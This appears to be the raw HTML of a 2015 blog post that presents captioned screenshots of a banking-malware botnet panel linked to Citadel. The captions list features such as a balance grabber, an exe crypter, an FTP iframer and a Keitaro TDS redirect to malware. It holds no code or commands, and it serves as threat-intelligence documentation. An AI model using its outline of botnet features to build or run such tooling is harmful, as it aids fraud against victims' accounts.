&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg__OUS8D52psmOZYzq3kwvR7y4vVID6ukOf4ZshvVItlDOlGH_c0EFt5VvQoS0kqxHX_wGhKkUlFgVe-mSwsvnd1hH0mut7grwKcjFBtska22iDuqK-jNb8d-qxk-NZfILoWHpCN5V1c4/s1600/2015-11-02_16-52-31.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg__OUS8D52psmOZYzq3kwvR7y4vVID6ukOf4ZshvVItlDOlGH_c0EFt5VvQoS0kqxHX_wGhKkUlFgVe-mSwsvnd1hH0mut7grwKcjFBtska22iDuqK-jNb8d-qxk-NZfILoWHpCN5V1c4/s1600/2015-11-02_16-52-31.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Setup:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoTeRV96D_LTGURQEABPiPcwTDdBVC7b_QtQXxD5_DMTih72PjDuln4NoMy_vUN73_ZIQnjh5ViUdhWJ_kHuK_HgJzjonAxPlJqLDYhqtC7MV3_oQHtZt8aoPucjpPROk0ZNQjtqsM3e8/s1600/2015-11-22_15-46-32.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoTeRV96D_LTGURQEABPiPcwTDdBVC7b_QtQXxD5_DMTih72PjDuln4NoMy_vUN73_ZIQnjh5ViUdhWJ_kHuK_HgJzjonAxPlJqLDYhqtC7MV3_oQHtZt8aoPucjpPROk0ZNQjtqsM3e8/s400/2015-11-22_15-46-32.png&quot; width=&quot;351&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
With a reference to citadel.&lt;br /&gt;
&lt;br /&gt;
Report:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_dY8BE8vLcTWWe5YbPRFmGvpxCVd70qhHw5-Kx70FnGTXDRhle5ZL5h-DghIAZ4pivd7utyIZJYL824d8TNNxLElcN6rnKHdI0DySQb9TjtJPNAPxVVgGfJorx0BCbj4k3qM4Ge6vrIM/s1600/2015-11-02_19-44-40.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;230&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_dY8BE8vLcTWWe5YbPRFmGvpxCVd70qhHw5-Kx70FnGTXDRhle5ZL5h-DghIAZ4pivd7utyIZJYL824d8TNNxLElcN6rnKHdI0DySQb9TjtJPNAPxVVgGfJorx0BCbj4k3qM4Ge6vrIM/s400/2015-11-02_19-44-40.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx0tFkKvb7ijlAC2BfTcGpi-coK-CiZmarzBIM3sihW-Gjz9X-KBCRWf9h_tNJIg_2weqHpcai1FT9F_BKtEmULHX79mA_Ka7F2oLURZ7EE2B72vhIKL17vY-7sjbVrxOeyxVEr1kp338/s1600/2015-11-02_19-49-19.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;240&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx0tFkKvb7ijlAC2BfTcGpi-coK-CiZmarzBIM3sihW-Gjz9X-KBCRWf9h_tNJIg_2weqHpcai1FT9F_BKtEmULHX79mA_Ka7F2oLURZ7EE2B72vhIKL17vY-7sjbVrxOeyxVEr1kp338/s400/2015-11-02_19-49-19.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Favorite reports:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLIcJGbxVu_wwDrHKU2fP8h289gj-UvAFL18xNonJQzYtXuVhfFEZhAgfZ8tbTL8vKI9dCIHHqhbKzyrCQ_UXRaOP61Sw0Fq6Tdab5UkEwM7-U0VAF-j17G7H4Fw267LNUN53DMXJe6NM/s1600/2015-11-02_16-58-04.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;358&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLIcJGbxVu_wwDrHKU2fP8h289gj-UvAFL18xNonJQzYtXuVhfFEZhAgfZ8tbTL8vKI9dCIHHqhbKzyrCQ_UXRaOP61Sw0Fq6Tdab5UkEwM7-U0VAF-j17G7H4Fw267LNUN53DMXJe6NM/s400/2015-11-02_16-58-04.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Search in files:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwLn5kVj7yiK9HnMBBgIiaMS029ccVSNm0hG53CSDhn0sh_Ki2tLL9LTNd6U-v8NLQn13j3Du3hDrtvvQPaa-Z_XdngmGEf3S5qVRVTCHcOsBhvSiuj_Q8ChU_Irg5Al_CNruzpcuPYsM/s1600/2015-11-02_17-04-05.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;357&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwLn5kVj7yiK9HnMBBgIiaMS029ccVSNm0hG53CSDhn0sh_Ki2tLL9LTNd6U-v8NLQn13j3Du3hDrtvvQPaa-Z_XdngmGEf3S5qVRVTCHcOsBhvSiuj_Q8ChU_Irg5Al_CNruzpcuPYsM/s400/2015-11-02_17-04-05.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Screenshot:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg178sc1iJm804d8qEExHnSQsFizPmihOBvr4T1Cn-IHfVeI-VHpcZemFMG3L1UwUIpuNHfWrlCMNT8yQ5WjrE93XU5K3HEBjyuNh7GiSPb955OY9XrXtXiGGtA0o79uYY9HNPZs7JdxgA/s1600/2015-11-02_17-04-43.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;358&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg178sc1iJm804d8qEExHnSQsFizPmihOBvr4T1Cn-IHfVeI-VHpcZemFMG3L1UwUIpuNHfWrlCMNT8yQ5WjrE93XU5K3HEBjyuNh7GiSPb955OY9XrXtXiGGtA0o79uYY9HNPZs7JdxgA/s400/2015-11-02_17-04-43.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
View videos:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijPTK0n4NjV_RNIp3CwRjoeloP9JtOXtYKGxHs1yp5U3W-fY7ldFrUoIqo7x8kaqKTsQSzQolAF0Q3SjzrFCceai_w6QbxX2qNa44ZVvlgMVGlHdXyzxt88-RLF1VeJ34Vqc0newN_yEQ/s1600/2015-11-02_17-05-38.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;358&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijPTK0n4NjV_RNIp3CwRjoeloP9JtOXtYKGxHs1yp5U3W-fY7ldFrUoIqo7x8kaqKTsQSzQolAF0Q3SjzrFCceai_w6QbxX2qNa44ZVvlgMVGlHdXyzxt88-RLF1VeJ34Vqc0newN_yEQ/s400/2015-11-02_17-05-38.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
CMD parser:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3UsSBRl7LfFD7ejKy0a8T5_p_4aVVwN0_p3XNcvffooTHmVHnnTBMGkYft_Q10TowGeQVpsQW-F80dtmkcroh4coxrvipqmHVsEk4fhCq2SJ90vr7dnWpAzrUwGPNgJumRJVnVUutMr0/s1600/2015-11-02_17-07-26.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;285&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3UsSBRl7LfFD7ejKy0a8T5_p_4aVVwN0_p3XNcvffooTHmVHnnTBMGkYft_Q10TowGeQVpsQW-F80dtmkcroh4coxrvipqmHVsEk4fhCq2SJ90vr7dnWpAzrUwGPNgJumRJVnVUutMr0/s400/2015-11-02_17-07-26.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Neuromodel:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBKZr7Hex_B2Ff5Js5yfea2IELE66a0cR4f8IXymqRbp8FNBYEP-3SDvXb90D0RLyhXVmdoIVAkn-aVcU3P-L4oz1qkOKQTMAkqF22Yc7loIeBTBLmw2uywyD6-EYbfm3hMDxPgcux910/s1600/2015-11-02_17-09-14.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBKZr7Hex_B2Ff5Js5yfea2IELE66a0cR4f8IXymqRbp8FNBYEP-3SDvXb90D0RLyhXVmdoIVAkn-aVcU3P-L4oz1qkOKQTMAkqF22Yc7loIeBTBLmw2uywyD6-EYbfm3hMDxPgcux910/s400/2015-11-02_17-09-14.png&quot; width=&quot;381&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Edit:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTA6xZRH8NIYTESH8f0Y684AvmZ3UVD5iSBel8P96Sigk2-Mdu4_I4fMQ0GK7JqFqSRQcf4hKpyUvKumeieOU1VMRf0NrjGo05uFqQRNJf1BN2B1IKFr47FKPn8iSEL7WVku6GAOZ7MDQ/s1600/2015-11-02_17-10-54.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTA6xZRH8NIYTESH8f0Y684AvmZ3UVD5iSBel8P96Sigk2-Mdu4_I4fMQ0GK7JqFqSRQcf4hKpyUvKumeieOU1VMRf0NrjGo05uFqQRNJf1BN2B1IKFr47FKPn8iSEL7WVku6GAOZ7MDQ/s400/2015-11-02_17-10-54.png&quot; width=&quot;381&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXRKJelP4ucKx2-9ZUCNzDEFA5ZpbmvI9U2Aq2qkHlOb2MI0Jgy_JqUf6oZcxJray2s86dNjjmYa0tuZTgIzGABKTJHzYI-dfiefosnJ6sY82T0c8FmvBtNOo6HrNWdtxdtG_AEvejhFM/s1600/2015-11-02_17-13-41.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXRKJelP4ucKx2-9ZUCNzDEFA5ZpbmvI9U2Aq2qkHlOb2MI0Jgy_JqUf6oZcxJray2s86dNjjmYa0tuZTgIzGABKTJHzYI-dfiefosnJ6sY82T0c8FmvBtNOo6HrNWdtxdtG_AEvejhFM/s1600/2015-11-02_17-13-41.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuhyjEjrD9GnmCEBoUHe9TWWrFQOhyphenhyphen7jys1oaVeU2z5upbS4Seb7C-rtA296BCixKlESurijopi8d-Jg5N4y6Kq13Nv2jBJTu6rPYKOrPx8GKC3hCDYvZ_7OPOHh4s0ubXEe8gD17LTiE/s1600/2015-11-02_17-20-53.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuhyjEjrD9GnmCEBoUHe9TWWrFQOhyphenhyphen7jys1oaVeU2z5upbS4Seb7C-rtA296BCixKlESurijopi8d-Jg5N4y6Kq13Nv2jBJTu6rPYKOrPx8GKC3hCDYvZ_7OPOHh4s0ubXEe8gD17LTiE/s1600/2015-11-02_17-20-53.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvtj3IJ9AYykVMpRdtPutT_v0mXkQ0IjpY3qO1S7rCfWobD_RnEyR4fPFH6t09GqwfdudUWBRBPiXUVkO8TsxUOdpCja75a9IywJMIjvew_X2X7gw-dxfgoF8f_s2dTXWYQ_sZox2VMZ0/s1600/2015-11-02_17-21-30.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvtj3IJ9AYykVMpRdtPutT_v0mXkQ0IjpY3qO1S7rCfWobD_RnEyR4fPFH6t09GqwfdudUWBRBPiXUVkO8TsxUOdpCja75a9IywJMIjvew_X2X7gw-dxfgoF8f_s2dTXWYQ_sZox2VMZ0/s1600/2015-11-02_17-21-30.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Links:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUyA4vn3sf_0cdyrpyWyxYt4mTvgKb-KZ7PMIU5rXUP43jglAC_lRSk3Gq1-MatJQaaxSlu3Fcrc0-RBRJVqI730KbDZtpUWUpwI7WQGW77-5onBcjTv_43Y9U8QC76bh61gZ93A3a-Fc/s1600/2015-11-02_17-22-03.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUyA4vn3sf_0cdyrpyWyxYt4mTvgKb-KZ7PMIU5rXUP43jglAC_lRSk3Gq1-MatJQaaxSlu3Fcrc0-RBRJVqI730KbDZtpUWUpwI7WQGW77-5onBcjTv_43Y9U8QC76bh61gZ93A3a-Fc/s400/2015-11-02_17-22-03.png&quot; width=&quot;381&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Balance grabber:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtB9ZIslbjrTAQV5Vx_np1MkEOTGwAY0xeSfVIT6Ydt2lAJkyBKc0GbT8ZQ9BsBCnBVk6ptBdu7tuq1WDQW9hZMxVO3GbgqPaNP6D4JVRz3WhujgkPLjEIaE4sxn4tQdXYEoKsI7Yvq-U/s1600/2015-11-02_17-23-08.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtB9ZIslbjrTAQV5Vx_np1MkEOTGwAY0xeSfVIT6Ydt2lAJkyBKc0GbT8ZQ9BsBCnBVk6ptBdu7tuq1WDQW9hZMxVO3GbgqPaNP6D4JVRz3WhujgkPLjEIaE4sxn4tQdXYEoKsI7Yvq-U/s400/2015-11-02_17-23-08.png&quot; width=&quot;381&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvoS9iUntBQWnoBYU9oBv8Lyg1_dmMVJHpuQKTYTepRuM-VMPPgtwL_fKnMyt3MuleIaNUeXapf1jUuYyM9KYvaGZ4QPOPGXMoORiDgY8pUmkf1nVZcxE5UuIAqjkVpZDwuxTj0FDOiZM/s1600/2015-11-02_20-03-29.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvoS9iUntBQWnoBYU9oBv8Lyg1_dmMVJHpuQKTYTepRuM-VMPPgtwL_fKnMyt3MuleIaNUeXapf1jUuYyM9KYvaGZ4QPOPGXMoORiDgY8pUmkf1nVZcxE5UuIAqjkVpZDwuxTj0FDOiZM/s1600/2015-11-02_20-03-29.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Config:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi098G5LmFrinpRL4TVMCE5d20yKhEk9nnGaXoEayqT851PJCZgkAB5O70yQtJqKC9o_xT7Y4ACygR3xRJzXgoVzuSwu1U3bBiQdyAFDWJ2a5WXjQxk27X1KXY33KbEURJyu3xDZNkEQJQ/s1600/2015-11-02_19-59-13.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;346&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi098G5LmFrinpRL4TVMCE5d20yKhEk9nnGaXoEayqT851PJCZgkAB5O70yQtJqKC9o_xT7Y4ACygR3xRJzXgoVzuSwu1U3bBiQdyAFDWJ2a5WXjQxk27X1KXY33KbEURJyu3xDZNkEQJQ/s400/2015-11-02_19-59-13.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Activity:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD-6OasJd8SbaJvSnyC9zXOU7D2FNElO8BzI-1JzSUyxE-6G2cyRW-xsdZsG15VkbPWp3909KNJDIG68osruQATFl34gcE2xh7X5591P40Tqi6bqoWQtpRh_N93U7tHj8TK1PQW3Wl2AQ/s1600/2015-11-02_20-01-18.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;338&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD-6OasJd8SbaJvSnyC9zXOU7D2FNElO8BzI-1JzSUyxE-6G2cyRW-xsdZsG15VkbPWp3909KNJDIG68osruQATFl34gcE2xh7X5591P40Tqi6bqoWQtpRh_N93U7tHj8TK1PQW3Wl2AQ/s400/2015-11-02_20-01-18.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEnDnOuI8TnEIomTxhbeJ7lt81Bd3ttz7z4lcA20wauB_GbIV-WTjIOFkIBbA5HNoTLMoPouwKc4DX_PpF4Nyb1GCYoYko3DksdiqVBZkJTwu8ZBCs2oXlaB4VfCDivz_DNQehnXhUsd4/s1600/2015-11-02_20-01-49.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;338&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEnDnOuI8TnEIomTxhbeJ7lt81Bd3ttz7z4lcA20wauB_GbIV-WTjIOFkIBbA5HNoTLMoPouwKc4DX_PpF4Nyb1GCYoYko3DksdiqVBZkJTwu8ZBCs2oXlaB4VfCDivz_DNQehnXhUsd4/s400/2015-11-02_20-01-49.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Jabber notifier:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLeyrYAzh156flD_RcwFhWngIzqUy09w-kynkIL2gRZfgXx-T0cM9j9V5d8E-uWtbQvQbQuGrReeQHldIHUwGbuCf5I33EP9F82qvDjs1ubm_AsUpq9MpUZCcSoAU6MKPqRFrS03gyMP8/s1600/2015-11-02_17-23-53.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;302&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLeyrYAzh156flD_RcwFhWngIzqUy09w-kynkIL2gRZfgXx-T0cM9j9V5d8E-uWtbQvQbQuGrReeQHldIHUwGbuCf5I33EP9F82qvDjs1ubm_AsUpq9MpUZCcSoAU6MKPqRFrS03gyMP8/s400/2015-11-02_17-23-53.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Notes:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH4b5roZmJTTnA-n2ZH2gp-XvfsJv8ULYLzKnitPfe3g9eTG-NN-DdW_dtbZObHVBdy6LKu2l0bHw5p0peVV14EGIOEL5kRTJSXKBNmDn4qfx45gAuw7pSZOu2aHwJw7gLj0vEdGr0Vog/s1600/2015-11-02_17-24-43.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH4b5roZmJTTnA-n2ZH2gp-XvfsJv8ULYLzKnitPfe3g9eTG-NN-DdW_dtbZObHVBdy6LKu2l0bHw5p0peVV14EGIOEL5kRTJSXKBNmDn4qfx45gAuw7pSZOu2aHwJw7gLj0vEdGr0Vog/s400/2015-11-02_17-24-43.png&quot; width=&quot;377&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Crypt exe:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJeGbEzWhz-uHu1YVTpdcLzahX3rPp-Nf-3LFlPYJbChpZ5OAJeD3YpLOTM2TeewH8v6WTyRSpr8RTsd-ubm6Pyr1WzOgBj-32Qpp-pqs-Mu4EOTqdnNMzNnuvBf3YpNxe2G3LQJG_UxU/s1600/2015-11-02_17-25-11.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJeGbEzWhz-uHu1YVTpdcLzahX3rPp-Nf-3LFlPYJbChpZ5OAJeD3YpLOTM2TeewH8v6WTyRSpr8RTsd-ubm6Pyr1WzOgBj-32Qpp-pqs-Mu4EOTqdnNMzNnuvBf3YpNxe2G3LQJG_UxU/s400/2015-11-02_17-25-11.png&quot; width=&quot;377&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
FTP iframer:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw13pSslNilImVo-pbTZVnUhAE0xEGjr39cvfMBpa35-7keE4gGY0TlHDk9IzbLe47DW06Zp1WbJhbv3hMkBTmN7Ar67hEeyFmU5yxvdUvlZQ5_pnAzDefwDvoGzXRXB3rrpILtdN6IQk/s1600/2015-11-02_17-25-56.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw13pSslNilImVo-pbTZVnUhAE0xEGjr39cvfMBpa35-7keE4gGY0TlHDk9IzbLe47DW06Zp1WbJhbv3hMkBTmN7Ar67hEeyFmU5yxvdUvlZQ5_pnAzDefwDvoGzXRXB3rrpILtdN6IQk/s400/2015-11-02_17-25-56.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Config:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOMhDdRWZ9VwXc4CkE-FD83toNRVhtCZMyyYkIh-HrXdbg-nzFjV36X_pk975vhOxe90xiKjmbmpBclQhWOAE3_bnxVTCVPvIlIBPRjzCcaUeruNpr0tINhq0DEOC8T3xUfItRQdvQzeo/s1600/2015-11-02_20-05-17.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOMhDdRWZ9VwXc4CkE-FD83toNRVhtCZMyyYkIh-HrXdbg-nzFjV36X_pk975vhOxe90xiKjmbmpBclQhWOAE3_bnxVTCVPvIlIBPRjzCcaUeruNpr0tINhq0DEOC8T3xUfItRQdvQzeo/s400/2015-11-02_20-05-17.png&quot; width=&quot;338&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Iframe lead on a Keitaros TDS who lead on malware:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjnOtvH2RxTEc-blqs1tM9Z4pBsLJaGXprdGjaACJZlbodPWHc_870RMljNar8BRyeDICkU4SIwe73jbf3SEzZ9dw0w2J0FtIIEJEB31ujaKkjDFHZqzymC_y8uJpLowqUv1fp2RrYOFI/s1600/2015-11-22_14-59-50.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;180&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjnOtvH2RxTEc-blqs1tM9Z4pBsLJaGXprdGjaACJZlbodPWHc_870RMljNar8BRyeDICkU4SIwe73jbf3SEzZ9dw0w2J0FtIIEJEB31ujaKkjDFHZqzymC_y8uJpLowqUv1fp2RrYOFI/s400/2015-11-22_14-59-50.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
